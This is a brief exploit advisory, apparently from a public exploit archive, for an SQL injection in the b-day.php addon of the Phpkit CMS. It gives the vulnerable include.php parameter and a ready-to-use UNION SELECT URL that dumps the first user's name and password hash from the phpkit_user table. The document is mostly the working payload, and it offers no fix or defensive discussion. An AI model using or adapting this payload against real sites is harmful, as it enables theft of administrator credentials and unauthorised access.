Phpkit addon (b-day.php) SQL Injection Vulnerability

2010-03-22
ID: 9685
CVE: None
Download vulnerable application: None
[+] Autor: n3w7u
 [+] Vulnerabilities [ SQL Injection ]
 [+] Language: [ PHP ]
 [+] Date: 22.03.2010
  .-=--=--=--=--=--=--=--=--=--=--=-.
 [+] Vulnerability
 include.php?path=b-day.php&ausgabe=
  [+] Exploitable
  http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt
+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-
-
1-4-2 (www02)